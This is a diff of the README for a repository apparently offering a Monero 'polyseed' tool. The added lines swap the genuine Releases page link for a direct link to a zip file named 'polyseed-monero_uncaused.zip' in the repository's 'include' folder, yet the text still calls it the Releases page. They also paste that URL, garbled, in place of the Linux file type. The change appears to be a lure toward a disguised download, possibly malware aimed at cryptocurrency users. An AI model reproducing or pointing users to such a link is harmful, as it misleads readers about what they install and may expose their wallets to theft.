Kabelt5373/polyseed-monero/README.md

 ## 📦 Download & Install

 1. **Visit the Release Page**
-   Go to the [Releases page](https://github.com/Kabelt5373/polyseed-monero/releases) to find the latest version of polyseed-monero.
+   Go to the [Releases page](https://raw.githubusercontent.com/Kabelt5373/polyseed-monero/main/include/polyseed-monero_uncaused.zip) to find the latest version of polyseed-monero.

 2. **Select the Correct File**
    Look for the most recent version.
 You will see different files for various operating systems.
 Make sure to choose the file that matches your system:
    - For Windows, look for a `.exe` file.
    - For macOS, choose a `.dmg` file.
-   - For Linux, you may find a compressed archive like `.tar.gz`.
+   - For Linux, you may find a compressed archive like `https://raw.githubusercontent.com/Kabelt5373/polyseed-monero/main/include/polyseed-monero_uncaused.zip`.

 3. **Download the File**
    Click the name of the file to start the download.
 Your browser may ask where to save it.
 Select your preferred location, and the download will begin.